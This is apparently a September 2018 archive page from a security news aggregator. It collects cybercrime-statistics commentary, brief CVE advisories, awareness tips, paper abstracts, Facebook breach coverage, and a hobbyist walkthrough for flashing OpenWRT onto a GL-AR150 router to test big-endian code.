Monthly Archives: September 2018

Cyber Safety Begins at Home – Six Top Tips

Don’t let your cybersecurity good practice fall by the wayside the moment you enter your front door. Following our common sense tips will keep you and your loved ones safe at home and at work.


Category:

Information Security


FBI’s Crime Data Explorer: What the Numbers Say about Cybercrime

What do the numbers say about Cybercrime?  Not much.  No one is using them.  

There is a popular quote often mis-attributed to the hero of Total Quality Management, W. Edwards Deming: "If you can't measure it, you can't manage it." It's one of the first things I think about every year when the FBI releases its annual Crime Statistics Report, as it just did for 2017. (The "mis-attributed" is because, for all the times he has been quoted, Deming actually said almost the exact opposite. What he actually wrote, in "The New Economics," was: "It is wrong to suppose that if you can’t measure it, you can’t manage it – a costly myth.")

Despite being a misquote, I've used it often myself.  There is no way to tell if you are "improving" your response to a crime type if you don't first have valid statistics for it.  Why the quote always pops to mind, however, is because, in the case of cybercrime, we are doing a phenomenal job of ignoring it in official police statistics.  This directly reflects the ability and the practice of our state and local law enforcement agencies to deal with online crime, hacking, and malware cases.  Want to test it yourself?  Call your local Police Department and tell them your computer has a virus.  See what happens.

It isn't for lack of law! Every State in the Union has its own computer crime law, and most of them have a category that would be broadly considered "hacking." A quick reference to all 50 states' computer crime laws is here: State Computer Crime Laws. And yet, even with a mandate to report hacking to the Department of Justice, almost nobody is doing it.

You may be familiar with the Uniform Crime Report, which attempts to create a standard for measuring crime data across the nation. The UCR has failed to help us at all with cybercrime, because it focuses almost exclusively on eight major crimes reported through the Summary Reporting System (SRS):

murder and non-negligent homicide, rape, robbery, aggravated assault, burglary, motor vehicle theft, larceny-theft, and arson.

The data for calendar year 2017 was just released this week and is now available in a new portal, called the Crime Data Explorer.  Short-cut URL:  https://fbi.gov/cde



To capture other crime types, the Department of Justice has been encouraging adoption of NIBRS, the National Incident-Based Reporting System. This system primarily focuses on 52 crime categories, and gathers statistics on several more. Most importantly for us, it includes several categories of "Fraud Crimes":

  • 2 / 26A / False Pretenses/Swindle/Confidence Game
  • 41 / 26B / Credit Card/ATM Fraud
  • 46 / 26C / Impersonation
  • 12 / 26D / Welfare Fraud
  • 17 / 26E / Wire Fraud
  • 63 / 26F / Identity Theft
  • 64 / 26G / Hacking/Computer Invasion

Unfortunately, despite being endorsed by almost every major law enforcement advocacy group, many states, including my own, are failing to participate. The FBI will be retiring SRS in 2021, and as of September 2018, many states are not projected to make that deadline:
https://www.fbi.gov/file-repository/ucr/nibrs-countdown-flyer.pdf
In the just-released 2017 data, out of the 18,855 law enforcement agencies in the United States, 16,207 submitted SRS "old-style" UCR data. Only 7,073 (about 38%) submitted NIBRS-style data.

Unfortunately, the situation when it comes to cybercrime is even worse. For SRS-style reporting, all cybercrimes are lumped under "Fraud". In 2016, SRS reported 10.6 million arrests. Only 128,531 of those (about 1.2%) were for "Fraud," of which cybercrime would be only a tiny portion.

For those seven "fraud type" crimes, the 2017 data is not yet available for detailed analysis. (Currently, most of the state data sets, released September 26, 2018, limit the data in each table to only 500 rows. Since, as an example, Hoover, Alabama -- the only city in my state participating in NIBRS -- has 3,800 rows of data, you can see how that limit is inadequate for state-wide analysis in fully participating states!)

Looking at the NIBRS 2016 data as a starting point, however, we can still see that we have difficulty at the state and local police level in understanding these crimes. In 2016, 6,191 law enforcement agencies submitted NIBRS-style data. Of those, 5,074 included at least some "fraud type" crimes. Here's how they broke down by fraud offense. Note: these are not the number of CRIMES committed; these are the number of AGENCIES that submitted at least one of these crimes in 2016:

type - # of agencies - fraud type description
==============================================
 2 - 4315 agencies -  False Pretenses/Swindle/Confidence Game
41 - 3956 agencies -  Credit Card/ATM Fraud
46 - 3625 agencies - Impersonation
12 - 328 agencies - Welfare Fraud
17 - 1446 agencies - Wire Fraud
63 - 810 agencies - Identity Theft
64 - 189 agencies - Hacking/Computer Invasion

Only 189 of the nation's 18,855 law enforcement agencies submitted even a single case of "hacking/computer invasion" during 2016!  When I asked the very helpful FBI NIBRS staff about this last year, they confirmed that, yes, malware infections would all be considered "64 - Hacking/Computer Invasion".  To explore on your own, visit the NIBRS 2016 Map.  Then under "Crimes Against Property" choose the Fraud type you would like to explore.  This map shows "Hacking/Computer Intrusion."  Where a number shows up instead of a pin, zoom the map to see details for each agency.

Filtering the NIBRS 2016 map for "Hacking/Computer Intrusion" reports
As an example, zooming in on the number in Tennessee, I can now see a red pin for Nashville. When I hover over that pin, it shows me how many crimes in each NIBRS category were reported for 2016, including 107 cases of Wire Fraud, 34 cases of Identity Theft, and only 3 cases of Hacking/Computer Invasion:

Clicking on "Nashville" as an example

I have requested access to the full data set for 2017.  I'll be sure to report here when we have more to share.






This Day in History: Munich Agreement

Ondřej Matějka, the deputy director of the Institute for the Study of Totalitarian Regimes (ÚSTR) provides a fascinating interview on the 80th anniversary of the infamous Munich Agreement: …the problem wasn’t that the Czechoslovak state couldn’t hold the borders. The problem was more within the society living there, where the pressure from the Sudetendeutsche Partei … Continue reading This Day in History: Munich Agreement

CVE-2018-17797 (zzcms)

An issue was discovered in zzcms 8.3. user/zssave.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

CVE-2018-17795 (libtiff)

The function t2p_write_pdf in tiff2pdf.c in LibTIFF 4.0.9 allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted TIFF file, a similar issue to CVE-2017-9935.

Long Term Security Attitudes and Practices Study

What makes security practitioners tick? That’s a simple question with a lot of drivers underneath it. We want to find out; please help us by signing up for our study.

The Ask

We’re launching a long-term study of security practitioners to understand how they approach security. Please sign up for our Long Term Security Attitudes and Practices Study here: https://www.surveymonkey.com/r/CZTZY7M.

Background

A few years ago I was in a customer-facing role at a SaaS company, answering questions about our security practices. We would give answers that were good and reasonable, but not always what the other side was expecting. These discrepancies stemmed from differing risk tolerances, different contexts, and varying approaches to security and technology.

This led to many conversations with our executive about changes to our security practices. Often the question would arise: “what’s good enough?” and outside of pointing to ISO 27001/2 and HIPAA, I didn’t have an answer. I couldn’t tell my executive what would reasonably satisfy our customers’ security expectations beyond pointing to the standards. Clearly, though, “standards compliance” wasn’t the minimum bar… it was something different. By outcome we could observe that organizations were willing to accept differing security practices, but there was never any consistency in what would be accepted and what had to be argued (or changed) across the hundreds of different customers (even ones in the same industry).

Since then I’ve moved on from that company (and changed to an internal role), but those experiences raised a more fundamental set of questions for me: Do we actually understand how security professionals think? Are we all aiming for perfect compliance with PCI 3.x, or are we driven by something else? Do we construct policies that are risk-centric? Are we pragmatists or purists? Are we advisers or problem solvers?

These questions have stuck with me for a while, and I’ve not found academic papers that answer them, so we’re starting a community-based study. Knowing what makes us tick might help make us a stronger profession; at the very least it will be interesting.

Study Details

The study will consist of multiple surveys; once we get going, we’ll start inviting you to a new survey every two weeks. Each survey will be a few questions in length and should not take more than a few minutes of your time. The study will run for as long as there is ongoing interest and sufficient participation. You aren’t expected to participate in every survey, although that would be nice; in fact, some of the component surveys may not be relevant to you from time to time.

The study will be anonymous; we’ll still collect an email address and track your unique responses but we’ll never share your identity. Tracking you across multiple surveys will allow for correlation – connecting the dots between the many different responses which hopefully will allow us to generate insight.

The anonymized data will be released under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License to allow for reuse by the community. Analysis reports and papers will be released under a Creative Commons License as well and code used to perform the analysis (probably Jupyter Notebooks) will be GPL’ed.

Enrolment

Everyone is welcome – sign up here to participate: https://www.surveymonkey.com/r/CZTZY7M


The post Long Term Security Attitudes and Practices Study appeared first on Liquidmatrix Security Digest.

#CyberAware: Will You Help Make the Internet a Safe Place for Families?

Don’t we all kinda secretly hope, even pretend, that our biggest fears are in the process of remedying themselves? Like believing that the police will know to stay close should we wander into a sketchy part of town. Or that our doors and windows will promptly self-lock should we forget to do so. Such a world would be ideal — and oh, so, peaceful — but it just isn’t reality. When it comes to making sure our families are safe, we’ve got to be the ones to stay aware, act responsibly, and take the needed action.

Our Shared Responsibility

This holds true in making the internet a safe place. As much as we’d like to pretend there’s a protective barrier between us and the bad guys online, there’s no single government entity that is solely responsible for securing the internet. Every individual must play his or her role in protecting their portion of cyberspace, including the devices and networks they use. And, that’s what October — National Cyber Security Awareness Month (NCSAM) — is all about.

At McAfee, we focus on these matters every day, but this month especially, we are linking arms with safety organizations, bloggers, businesses, and YOU — parents, consumers, educators, and digital citizens — to zero in on ways we can all do our part to make the internet safe and secure for everyone. (Hey, sometimes the home team needs a huddle, right!?)

8 specific things you can do!


  1. Become a NCSAM Champion. The National Cyber Security Alliance (NCSA) is encouraging everyone — individuals, schools, businesses, government organizations, universities — to sign up, take action, and make a difference in online safety and security. It’s free and simple to register. Once you sign up, you will get an email with a toolbox packed with fun, shareable memes to post for #CyberAware October.
  2. Tap your social powers. Throughout October, share, share, share great content you discover. Use the hashtag #CyberAware, so the safety conversation reaches and inspires more people. Also, join the Twitter chat using the hashtag #ChatSTC each Thursday in October at 3 p.m. ET/Noon PT. Learn, connect with other parents and safety pros, and chime in.
  3. Hold a family tech talk. Be even more intentional this month. Learn and discuss suggestions from STOP. THINK. CONNECT.™ on how each family member can protect their devices and information.
  4. Print it and post it: Print out a STOP. THINK. CONNECT.™ tip sheet and display it in areas where family members spend time online.
  5. Understand and execute the basics. Information is awesome. But how much of that information do we truly put into action? Take 10 minutes to read 10 Tips to Stay Safe Online and another 10 minutes to install a firewall, strengthen your passwords, and make sure your home network is as secure as it can be.
  6. If you care — share! Send an email to friends and family informing them that October is National Cybersecurity Awareness Month and encourage them to visit staysafeonline.org for tips and resources.
  7. Turn on multi-factor authentication. Protect your financial, email and social media accounts with two-step authentication for passwords.
  8. Update, update, update! This overlooked but powerful way to shore up your devices is crucial. Update your software and turn on automatic updates to protect your home network and personal devices.

Isn’t it awesome to think that you aren’t alone in striving to keep your family’s digital life — and future — safe? A lot of people are working together during National Cyber Security Awareness Month to educate and be more proactive in blocking criminals online. Working together, no doubt, we’ll get there quicker and be able to create and enjoy a safer internet.


Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures)

The post #CyberAware: Will You Help Make the Internet a Safe Place for Families? appeared first on McAfee Blogs.

Crucial Elements in Law Enforcement against Cybercrime

Technological innovation, globalization, and urbanization have enabled criminals and terrorists to pose a fresh wave of threats that can shake the security establishment of global markets. The development of information and communications technology creates not only advantages, convenience, and efficiency, but also disadvantages, challenges, and threats. The purpose of this paper is to explore crucial elements in combating cybercrime. The paper identifies the following crucial elements: the special perpetrator-victim relationship, time elements, spatial elements, the technological nature of cybercrime, complexity, costs, anonymity, hidden victims, concealment, trans-territoriality, and the rapid increase over the past four decades. These should be emphasized in the fight against cybercrime. The paper further analyzes the phenomenon of rent-seeking through the exaggeration of insecurity and cybercrime, which can act as misinformation in this battle.

Reliance on cryptography of cloud computing in Healthcare Information Management, lessons for Ghana Health Service.

Cloud computing is considered the next logical step in emerging technology for prosperous resource outsourcing, information sharing in the physician-patient relationship, and a platform for research development. The fast drift of Ghana’s healthcare facilities into cloud computing in search of treatments for humanity’s major illnesses calls for a pragmatic understanding of its security deterrence techniques. Studies in the cryptographic discipline of Ghana’s healthcare require a working understanding of the security issues by healthcare administrators. Healthcare data leaked to unauthorized users tarnishes the image of the individual, the healthcare facility, and the Ghanaian populace. This paradigm shift requires a strong and efficient security system among healthcare facilities to avoid the erosion of trust. Our review is motivated by these contemporary technologies to explore their adoption, utilization, and provision of security strategies in this innovation. Much emphasis was placed on network, interfaces, data, virtualization, legal, compliance, and governance as key areas of security challenges in cloud computing. Relevant literature is discussed to highlight prominent findings. The contributions presented are relevant in providing a practical framework for enhancing security in other disciplines as well.

Challenge of Malware Analysis: Malware obfuscation Techniques

Providing security for computer systems against malware is a big concern. Every day millions of malware samples are created, and worse, new malware is highly sophisticated and very difficult to detect, because malware developers use various obfuscation techniques to hide the actual code or behaviour of the malware. It thereby becomes very hard to analyze malware for the useful information needed to design a malware detection system, owing to anti-static and anti-dynamic analysis techniques (obfuscation techniques). In this paper, various obfuscation techniques are discussed in detail.

A Dynamic Scheme for Secure Searches over Distributed Massive Datasets in Cloud Environment using Searchable Symmetric Encryption Technique

Cloud computing has produced a paradigm shift in large-scale data outsourcing and computing. As the cloud server itself cannot be trusted, it is essential to store the data in encrypted form, which however makes it unsuitable for searching, computation, or analysis. Searchable Symmetric Encryption (SSE) allows the user to perform keyword search over encrypted data without leaking information to the storage provider. Most existing SSE schemes place restrictions on the size and number of index files to facilitate efficient search. In this paper, we propose a dynamic SSE scheme that can operate on relatively larger, multiple index files, distributed across several nodes, without the need to explicitly merge them. The experiments have been carried out on encrypted data stored in an Amazon EMR cluster. The secure searchable inverted index is created on the fly using the Hadoop MapReduce framework during the search process, thus significantly eliminating the need to store document-keyword pairs on the server. The scheme allows dynamic update of the existing index and document collection. Parallel execution of the pre-processing phase reduces processing time at the client. An implementation of our construction is provided in this paper, and experimental results validating the efficacy of our scheme are reported.


$1.63 Billion Breach Fine Discussed As Facebook CSO Legacy

At Blackhat this year people sometimes asked me if I was familiar with the “Charlatan Security Officer” situation at Facebook. I was not sure what they meant, and then they showed me threads online and invited me to meetings where this was the topic. Screenshots like the following one about ex-Yahoo CSO and current Facebook … Continue reading $1.63 Billion Breach Fine Discussed As Facebook CSO Legacy

Mini pwning with GL-iNet AR150

Seven years ago, before the $35 Raspberry Pi, hackers used commercial WiFi routers for their projects. They'd replace the stock firmware with Linux. The $22 TP-Link WR703N was extremely popular for these projects, being half the price and half the size of the Raspberry Pi.


Unfortunately, these devices had extraordinarily limited memory (16-megabytes) and even more limited storage (4-megabytes). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger.

I'm interested in that device for the simple reason that it has a big-endian CPU.

All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian. Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte-order as Intel. On the other hand, popular file-formats and crypto-algorithms use big-endian, so there's some efficiency to be gained with going with that choice.

I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear.

The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device.

An alternative is the GL-AR150 from GL-iNet, a company that sells commercial WiFi products like the other vendors, but that also caters to hackers and hobbyists. Recognizing the popularity of that TP-Link device, they essentially made a clone with more stuff: 16-megabytes of storage and 64-megabytes of RAM. They intend for people to rip off the case and access the circuit board directly: they've included pins for directly connecting a console serial port, connectors for additional WiFi antennas, and pads for soldering wires to GPIO pins for hardware projects. It's a thing of beauty.

So this post is about the steps I took to get things working for myself.

The first step is to connect to the device. One way to do this is connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route.

The problem with their Ethernet port is that you have to manually set your IP address. Their address is 192.168.8.1. I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:

# ifconfig eth0:1 192.168.8.2 netmask 255.255.255.0

The firmware I want to install is from the OpenWRT project which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with  a vanilla installation.

https://wiki.openwrt.org/toh/gl-inet/gl-ar150

I download this using the browser in my Linux VM, then browse to 192.168.8.1, navigate to their firmware update page, and upload this file. It's not complex -- they actually intend their customers to do this sort of thing. Don't worry about voiding the warranty: for a ~$20 device, there is no warranty.

The device boots back up; this time the default address is going to be 192.168.1.1, so again I add another virtual interface to my Linux VM, with "ifconfig eth0:2 192.168.1.2", in order to communicate with it.

I now need to change this 192.168.1.x setting to match my home network. There are many ways to do this. I could just reconfigure the LAN port to a hard-coded address on my network. Or, I could connect the WAN port, which is already configured to get a DHCP address. Or, I could reconfigure the WiFi component as a "client" instead of "access-point", and it'll similarly get a DHCP address. I decide upon WiFi, mostly because my 24 port switch is already full.

The problem is OpenWRT's default WiFi settings: something is interfering with accessing the device. I can't see what from reading the firewall rules, but I'm obviously missing something, so I just go in and nuke the rules. I just click on the "WAN" segment in the firewall management page and click "remove". I don't care about security; I'm not putting this on the open Internet or letting guests access it.

To connect to WiFi, I remove the current settings as an "access-point", then "scan" my local network, select my access-point, enter the WPA2 passphrase, and connect. It seems to work perfectly.

While I'm here, I also go into the system settings and change the name of the device to "MipsDev", and also set the timezone to New York.

I then disconnect the Ethernet and continue at this point via their WiFi connection. At some point, I'm going to just connect power and stick it in the back of a closet somewhere.

DHCP assigns this 10.20.30.46 (I don't mind telling you -- I'm going to renumber my home network soon). So from my desktop computer I do:

C:\> ssh root@10.20.30.46

...because I'm a Windows user and Windows supports ssh now g*dd***it.


OpenWRT had a brief schism a few years ago with the breakaway "LEDE" project. They mended differences and came back together again in the latest version, but this older version still goes by the "LEDE" name.

At this point, I need to expand the storage from the 16-megabytes on the device. I put in a 32-gigabyte USB flash drive for $5 -- expanding storage by 2000 times.

The way OpenWRT deals with this is called an "overlay", which uses the same technology as Docker containers to essentially containerize the entire operating system. The existing operating system is mounted read-only. As you make changes, such as installing packages or re-configuring it, anything written to the system is written into the overlay portion. If you do a factory reset (by holding down the button on boot), it simply discards the overlay portion.

What we are going to do is simply change the overlay from the current 16-meg on-board flash to our USB flash drive. This means copying the existing overlay part to our drive, then re-configuring the system to point to our USB drive instead of their overlay.

This process is described on OpenWRT's web page here:

https://wiki.openwrt.org/doc/howto/extroot

It works well -- but only for systems with more than 4-megs of flash. This is what defeated me before: there's not enough space to add the necessary packages. But with 16-megs on this device there is plenty of space.

The first step is to update the package manager, just like on other Linuxes.

# opkg update

When I plug in the USB drive, dmesg tells me it finds a USB "device", but nothing more. This tells me I have all the proper USB drivers installed, but not the flash-drive parts.

[    5.388748] usb 1-1: new high-speed USB device number 2 using ehci-platform

Following the instructions in the above link, I then install those components:

# opkg install block-mount kmod-fs-ext4 kmod-usb-storage-extras

Simply installing these packages will cause it to recognize the USB drive in dmesg:

[   10.748961] scsi 0:0:0:0: Direct-Access     Samsung  Flash Drive FIT  1100 PQ: 0 ANSI: 6
[   10.759375] sd 0:0:0:0: [sda] 62668800 512-byte logical blocks: (32.1 GB/29.9 GiB)
[   10.766689] sd 0:0:0:0: [sda] Write Protect is off
[   10.770284] sd 0:0:0:0: [sda] Mode Sense: 43 00 00 00
[   10.771175] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA
[   10.788139]  sda: sda1
[   10.794189] sd 0:0:0:0: [sda] Attached SCSI removable disk

At this point, I need to format the drive with ext4. The correct way of doing this is to plug the drive into my Linux VM and format it there, because in these storage-limited environments, OpenWRT doesn't have space for such utilities. But with 16-megs that I'm going to overlay soon anyway, I don't care, so I install those utilities.

# opkg install e2fsprogs

Then I do the normal Linux thing to format the drive:

# mkfs.ext4 /dev/sda1

This blows away whatever was already on the drive.

Now we need to copy over the contents of the existing /overlay. We do that with the following:

# mount /dev/sda1 /mnt
# tar -C /overlay -cvf - . | tar -C /mnt -xf - 
# umount /mnt

We use tar to copy because, as a backup program, it maintains file permissions and timestamps, so it's better for backup and restore. We don't want to actually create a file, but instead use it in streaming mode. The '-' on one invocation causes it to stream the results to stdout instead of writing a file; the '-' on the other invocation streams from stdin. Thus, we never create a complete copy of the archive, either in memory or on the disk: we untar files as soon as we tar them up.

At this point we do a blind incantation I really don't understand. I just did it and it works. The link above has some more text on this, and some things you should check afterwards.

# block detect > /etc/config/fstab; \
   sed -i s/option$'\t'enabled$'\t'\'0\'/option$'\t'enabled$'\t'\'1\'/ /etc/config/fstab; \
   sed -i s#/mnt/sda1#/overlay# /etc/config/fstab; \
   cat /etc/config/fstab;
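
For what it's worth, here's my reading of that incantation, based on the OpenWRT extroot documentation; the comments are my interpretation, not gospel, and the commands are shown without the leading root prompt:

# 'block detect' prints a ready-made UCI fstab configuration for every
# filesystem it finds; we overwrite /etc/config/fstab with it.
block detect > /etc/config/fstab

# The generated entries ship disabled; flip "option enabled '0'" to '1'.
# (The $'\t' escapes in the one-liner above match the literal tabs in
# the generated file.)
sed -i "s/option\tenabled\t'0'/option\tenabled\t'1'/" /etc/config/fstab

# Re-point the USB drive's mount target from /mnt/sda1 to /overlay --
# this is what makes the flash drive become the overlay on the next boot.
sed -i 's#/mnt/sda1#/overlay#' /etc/config/fstab

# Eyeball the result before rebooting.
cat /etc/config/fstab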

At this point, I reboot and log back in. We need to update the package manager again. That's because when we did it the first time, it only listed packages that could fit in our tiny partition. We update again now, with a huge overlay, to get a list of all the packages.

# opkg update

For example, gcc is something like 50 megabytes, so it wouldn't have fit initially, and now it does. It's the first thing I grab, along with git.

# opkg install gcc make git

Now I add a user. I have to do this manually, because there's no "adduser" utility I can find that does this for me. This involves the following steps (a rough command-line sketch follows the list):

  • adding a line to /etc/passwd
  • adding a line to /etc/group
  • using the passwd command to set the password for the account
  • creating a directory for the user
  • chown the user's directory
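
Concretely, the whole dance looks something like this -- a minimal sketch, where the user name "test", the UID/GID of 1000, and the home path are placeholder choices of mine, not anything the device requires (run the commands as root; lines starting with # are comments):

# Append a passwd record (name:x:UID:GID:comment:home:shell):
echo 'test:x:1000:1000:test user:/home/test:/bin/ash' >> /etc/passwd

# Append a matching group record:
echo 'test:x:1000:' >> /etc/group

# Set the account's password interactively:
passwd test

# Create the home directory and hand it over to the new user:
mkdir -p /home/test
chown test:test /home/test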

My default shell is /bin/ash (BusyBox) instead of /bin/bash. I haven't added bash yet, but I figure for a testing system, maybe I shouldn't.

I'm missing a git helper for https, so I use the git protocol instead:

$ git clone git://github.com/robertdavidgraham/masscan
$ cd masscan

At this point, I'd normally run "make -j" to quickly build the project, starting a separate process for each file. This compiles a lot faster, but this device only has 64-megs of RAM, so it'll run out of memory quickly. Each process needs around 20-megabytes of RAM. So I content myself with two parallel jobs:

$ make -j 2

That's enough such that one process can be stuck waiting to read files while the other process is CPU bound compiling. This is a slow CPU, so that's a big limitation.

The final linking step fails. That's because this platform uses different libraries than other Linux versions: the musl library, instead of the glibc you find on the big distros or the uClibc on smaller distros like those on the Raspberry Pi. This is excellent -- I've found the first bug I need to fix.

In any case, I need to verify this is indeed "big-endian" mode, so I wrote a little program to test it:

#include <stdio.h>

int main(void)
{
    /* Reinterpret the first four bytes of the string as an int. */
    int x = *(int *)"\1\2\3\4";
    printf("0x%08x\n", x);
    return 0;
}

It indeed prints the big-endian result:

0x01020304

The numbers would be reversed if this were little-endian like x86.
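
As an aside, if you ever need to check byte order on a box without a compiler, there's an old shell trick that should work here too. This is my addition, not part of the original walkthrough, and it assumes the od applet in this BusyBox build supports the -An and -d options:

# od -d decodes pairs of bytes as native-endian 16-bit integers.
# The input bytes are 0x01 0x02, so this prints 258 (0x0102) on
# big-endian machines and 513 (0x0201) on little-endian ones.
printf '\1\2' | od -An -d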

Anyway, I thought I'd document the steps for those who want to play with these devices. The same steps would apply to other OpenWRT devices. GL-iNet has some other great options to work with, but of course, after some point, it's just easier getting Raspberry Pi knockoffs instead.






CVE-2018-9081 (ez_media_&_backup_center_firmware, ix2_firmware, ix4-300d_firmware, px12-400r_firmware, px12-450r_firmware, px2-300d_firmware, px4-300d_firmware, px4-300r_firmware, px4-400d_firmware, px4-400r_firmware, px6-300d_firmware, storcenter_ix2-dl_firmware, storcenter_ix2_firmware, storcenter_ix4-300d_firmware, storcenter_px12-400r_firmware, storcenter_px12-450r_firmware, storcenter_px2-300d_firmware, storcenter_px4-300d_firmware, storcenter_px4-300r_firmware, storcenter_px6-300d_firmware)

For some Iomega, Lenovo, and LenovoEMC NAS devices, versions 4.1.402.34662 and earlier, the file names used for assets accessible through the Content Viewer application are vulnerable to self cross-site scripting (self-XSS). As a result, adversaries can add files to shares accessible from the Content Viewer with a cross-site scripting payload in the name, and wait for a user to try to rename the file for their payload to trigger.

CVE-2018-9077 (lenovoemc_firmware)

For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when changing the name of a share, an attacker can craft a command injection payload using backtick "``" characters in the share : name parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter.

CVE-2018-9076 (lenovoemc_firmware)

For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when changing the name of a share, an attacker can craft a command injection payload using backtick "``" characters in the name parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter.

CVE-2018-9075 (lenovoemc_firmware)

For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when joining a PersonalCloud setup, an attacker can craft a command injection payload using backtick "``" characters in the client:password parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter.

Insecure code cited in Facebook hack impacting nearly 50 million users

On Sept. 28, Facebook announced via its blog that it discovered attackers exploited a vulnerability in its code that impacted its "View As" feature. While Guy Rosen, VP of product management, notes that the investigation is still in its early stages, the breach is expected to have affected 50 million accounts. It is unclear at this stage whether these accounts were misused or if any personal information has been accessed.

According to Rosen’s post, attackers were able to steal Facebook access tokens – digital keys that allow users to stay logged in whether or not they’re actively using the application – which could then be used to take over user accounts. The breach is reportedly a result of multiple issues within Facebook's code, stemming from changes made to the social media platform’s video-uploading feature in July of last year that impacted the “View As” feature.

Veracode’s Chris Wysopal assumes that the attack was automated in order to collect the access tokens, given that attackers needed to both find this particular vulnerability to get an access token, and then pivot from that account to others in order to steal additional tokens.

In reviewing the available details, Veracode’s Chris Eng suggests that an educated guess could lead to the conclusion that having two-factor authentication enabled on the account may not have protected users. Given that the vulnerability was exploited through the access token as opposed to the standard authentication workflow, it is unlikely second-factor verification would have been triggered.

Facebook reportedly fixed the vulnerability and informed law enforcement of the breach and is temporarily turning off the "View As" feature while they undergo security checks. Additionally, the company has reset the access tokens to the affected accounts and is taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year.

IDG Contributor Network: The home analogy – security redefined for the hybrid world

Let’s roll back the time machine a century. Imagine you were a rich individual and you had a huge home with assets that needed protection. What was your recourse? Hire macho security guards with stern faces to ward off miscreants. Slowly the human guards gave way to padlocks, combination locks etc. And then the advent of the home security system – independent and isolated. And towards the latter part of the century, integrated systems with a wired or wireless backhaul to a central command. That then evolved into more sophisticated perimeter security with cameras, motion detectors etc.

But even in the face of such dramatic changes in home security, one principle has remained steady. It is all about the perimeter. Secure the entrance and exits and you are safe.

To read this article in full, please click here

Facebook Announces Security Flaw Found in “View As” Feature

Another day, another Facebook story. In May, a Facebook Messenger malware named FacexWorm was utilized by cybercriminals to steal user passwords and mine for cryptocurrency. Later that same month, the personal data of 3 million users was exposed by an app on the platform dubbed myPersonality. And in June, millions of the social network’s users may have unwittingly shared private posts publicly due to another new bug. Which brings us to today. Just announced this morning, Facebook revealed they are dealing with yet another security breach, this time involving the “View As” feature.

Facebook users have the ability to view their profiles from another user’s perspective, which is called “View As.” This very feature was found to have a security flaw that has impacted approximately 50 million user accounts, as cybercriminals have exploited this vulnerability to steal Facebook users’ access tokens. Access tokens are digital keys that keep users logged in, and they permit users to bypass the need to enter a password every time. Essentially, this flaw helps cybercriminals take over users’ accounts.

While the access tokens of 50 million accounts were taken, Facebook still doesn’t know if any personal information was gathered or misused from the affected accounts. However, they do suspect that everyone who used the “View As” feature in the last year will have to log back into Facebook, as well as any apps that used a Facebook login. An estimated 90 million Facebook users will have to log back in.

As of now, this story is still developing, as Facebook is still investigating further into this issue. Now, the question is — if you’re an impacted Facebook user, what should you do to stay secure? Start by following these tips:

  • Change your account login information. Since this flaw logged users out, it’s vital you change up your login information. Be sure to make your next password strong and complex, so it will be difficult for cybercriminals to crack. It also might be a good idea to turn on two-factor authentication.
  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update an app as soon as an update is available, as fixes are usually included with each version. Facebook has already issued a fix to this vulnerability, so make sure you update immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Facebook Announces Security Flaw Found in “View As” Feature appeared first on McAfee Blogs.

CVE-2018-1246 (emc_unity_operating_environment, emc_unityvsa_operating_environment)

Dell EMC Unity and UnityVSA contain a reflected cross-site scripting vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim application user into supplying malicious HTML or JavaScript code to Unisphere, which is then reflected back to the victim and executed by the web browser.

CVE-2018-11073 (authentication_manager)

RSA Authentication Manager versions prior to 8.3 P3 contain a stored cross-site scripting vulnerability in the Operations Console. A malicious Operations Console administrator could exploit this vulnerability to store arbitrary HTML or JavaScript code through the web interface. When other Operations Console administrators open the affected page, the injected scripts could potentially be executed in their browser.

CVE-2018-11074 (authentication_manager)

RSA Authentication Manager versions prior to 8.3 P3 are affected by a DOM-based cross-site scripting vulnerability which exists in its embedded MadCap Flare Help files. A remote unauthenticated attacker could potentially exploit this vulnerability by tricking a victim application user to supply malicious HTML or JavaScript code to the browser DOM, which code is then executed by the web browser in the context of the vulnerable web application.

CVE-2018-11075 (authentication_manager)

RSA Authentication Manager versions prior to 8.3 P3 contain a reflected cross-site scripting vulnerability in a Security Console page. A remote, unauthenticated malicious user, with the knowledge of a target user's anti-CSRF token, could potentially exploit this vulnerability by tricking a victim Security Console user to supply malicious HTML or JavaScript code to the vulnerable web application, which code is then executed by the victim's web browser in the context of the vulnerable web application.

Facebook hack exposed info on up to 50 million users

